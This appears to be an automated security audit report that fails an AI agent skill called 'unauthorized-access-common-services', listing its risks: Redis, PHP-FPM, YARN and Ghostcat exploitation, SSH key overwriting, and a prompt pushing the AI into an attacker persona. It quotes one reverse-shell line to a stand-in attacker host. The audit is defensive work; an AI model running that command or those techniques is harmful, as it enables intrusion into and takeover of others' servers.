unauthorized-access-common-services
Fail
Audited by Gen Agent Trust Hub on Apr 10, 2026
Risk Level: HIGH
Categories: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, DATA_EXFILTRATION, CREDENTIALS_UNSAFE, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill provides numerous terminal commands designed to scan and exploit network services, including port scanning and interaction with unauthenticated management interfaces.
- [REMOTE_CODE_EXECUTION]: Contains specific payloads and procedures to achieve remote code execution across multiple service types, including the use of master-slave replication in Redis, FastCGI injection in PHP-FPM, and application submission in Hadoop YARN. It specifically includes functional reverse shell strings (bash -i >& /dev/tcp/ATTACKER/4444 0>&1).
- [DATA_EXFILTRATION]: Details methods to extract sensitive files and download entire data modules through misconfigured services like Rsync and AJP (Ghostcat).
- [CREDENTIALS_UNSAFE]: Provides a mechanism to achieve persistent unauthorized access by overwriting the root user's SSH authorized_keys file via Redis.
- [PROMPT_INJECTION]: Employs instructions that direct the AI to assume an adversarial persona focused on infrastructure exploitation and unauthorized access.
Recommendations
- AI detected serious security threats
Audit Metadata